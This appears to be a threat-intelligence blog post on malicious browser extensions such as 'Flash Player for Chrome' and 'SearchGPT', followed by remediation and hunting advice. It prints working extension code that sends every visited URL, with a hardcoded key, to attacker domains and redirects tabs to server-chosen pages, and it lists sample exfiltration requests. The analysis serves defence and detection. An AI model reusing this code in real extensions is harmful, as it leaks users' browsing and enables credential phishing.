Sprawling Browser Extension Abuse

*Published: 7/11/2025* > **High-level Overview:** Following the publication from [Koi Security](https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5), multiple infections have been dug up. Further analysis into the behavior uncovered more infections and infrastructure. Based on the observed POST requests made from infected endpoints, this campaign appears to be rewriting pages and harvesting credentials. ## Delivery This is chalked up to end users installing extensions on their browser. The developer's extension is either: 1. Hijacked by the threat actor (TA) 2. Paid directly by the threat actor(s) to inject the malicious Javascript 3. Paid to transfer ownership of the extension to then inject malicious Javascript I suspect that across the sprawling browser extension ecosystem, there is a healthy mix of all three. ## Actions-on-Objective No hands-on-keyboard activity is noted at the time of writing. The campaign appears to be harvesting credentials and session details directly via the browser. The follow-on behavior could include hijacking the user's sessions to potentially brokering valid account access, which could theoretically lead to deployment of malware loaders or ransomware, however this **has not yet** been observed. ## Extension Analysis While the first reported blog post attributed this behavior to a campaign dubbed **RedDirection**, the abused browser extension ecosystem is immense. As more infrastructure and extensions have been uncovered from our single environment alone, the attribution to a single campaign quickly falls into murky water. The extensions performing same behavior (hardcoded API tokens, beaconing out with said token) had various naming conventions for the underlying Javascript files. In one example with the **Flash Player for Chrome** extension, `autoredirect.js` monitors all tab URL changes and sends them to `ebmitab[.]com` for redirection instructions, communicating with the browser’s tab system to update or create new tabs based on server responses. ![[flashplayer_extension.png]] In this example, you can see that the API token was hardcoded from this snippet: ```java const domain="ebmitab.com",key="8103ac6a6cf87fc2ce402bab0a6c5af9684be942",lnkOpts={keepTab:!0}; // <-- Harcoded API token with domain chrome.tabs.onUpdated.addListener((async(e,t,a)=>{ if(t.url){ let c={method:"POST",redirect:"follow"}; const n=await fetch(`https://${domain}/api?key=${key}&allowempty=1&out=`+encodeURIComponent(t.url)+"&format=txt&r="+Math.random(),c) .then((e=>e.text())) .then((e=>!(!e||!e.match(/^http/i))&&e)) .catch((e=>!1)); n&&n.match(/^http/i)&&(lnkOpts.keepTab? chrome.tabs.update(e,{url:n},(()=>{}) : chrome.tabs.create({active:a.active,index:a.index,url:n,windowId:a.windowId,pinned:a.pinned},(()=>{chrome.tabs.remove(e,(()=>{}) })) ) } })); ``` --- In our observations with other extensions such as **SearchGPT**, there was a different javascript file named `worker.js`. ![[searchgpt_extension.png]] The following code snippet is the heart of the extension’s malicious behavior, responsible for monitoring and manipulating visited websites from the victim's browser. ```javascript chrome.tabs.onUpdated.addListener((async (e, t, r) => { if (t.url) { let n = { method: "POST", redirect: "follow" }; const o = await fetch("https://abmitab.com/api?key=bec78b49f48a58c8bf22a3c59dc82e5151a089a1&allowempty=1&out=" + encodeURIComponent(t.url) + "&format=txt&r=" + Math.random(), n).then((e => e.text())).then((e => !(!e || !e.match(/^http/i)) && e)).catch((e => !1)); o && o.match(/^http/i) && chrome.tabs.update(e, { url: o }, (() => {})); } })); ``` It sets up a listener that activates every time a browser tab changes, such as when the victim visits a new website or refreshes a page. The variables `e`, `t`, and `r` represent the tab ID, details about the change (like the URL), and the tab itself, respectively. It then sets up the web request, hardcodes the API and the attacker's domain. After sending the URL, the code waits for the server’s response and converts it to text `(e.text())`. It then checks if the response is a valid URL starting with http or https `(e.match(/^http/i))`. If the response isn’t a valid URL or an error occurs, it returns false. The result is stored in `o`, which holds either a new URL or false. If the server returns a valid URL (stored in `o`), this line redirects the browser tab to that URL using chrome.tabs.update. For instance, if you were on chat.openai.com/chat and the server responds with https://fake-chat-openai.com/login, the browser is immediately redirected to the fake site, which could mimic ChatGPT’s login page to trick the victim into entering their credentials. ## Analysis into the POST Requests The POST requests to the infrastructure all contain the pattern `/api?key=` Here are some example POST requests that were observed in my environment: - `POST ebmitab[.]com/api?key=[hardcoded_api]&allowempty=1&out=https://organization.okta[.]com/login/token/redirect?stateToken=` - `POST addmitab[.]com/api?key=[hardcoded_api]&allowempty=1&out=https://mail.google[.]com/mail/u/0/#inbox&` Due to the widespread nature of these infections, it should be emphasized to look at the behavior rather than static IOCs. As highlighted above, the infrastructure is likely far more sprawling than initially reported. A hunt for static IOCs will largely be self-defeating. ## Remediation Steps - Remove the malicious extension - Reset all credentials for affected user - Clear all browser artifacts (cache, sessions, cookies, history) - Flush the DNS cache - Restart the host clear volatile memory ## Conclusion This situation begets the dilemma, is it a potentially unwanted program (PUP) that needs be ignored for the sanity of responders? Do we need to take further mitigations to prevent and detect this behavior? Will swatting at the endless hordes of static IOCs solve this problem? My opinion is that this needs to be remedied sooner rather than later. At its best, it's a fraudulent code injection that performs beaconing and harvests credentials. At its worst, it could be a time bomb, operating as an initial access broker auctioning off valid accounts. Mitigations should include stricter browser controls along with whitelisting valid extensions - a hardening feature which most organizations do not have. The main difficulty with this attack vector is what is benign today could be malicious tomorrow. That said, I hope that this inspires some queries targeting POST requests with hardcoded API tokens, along with searches for embedded API tokens within Javascript files in extension directories. Happy hunting!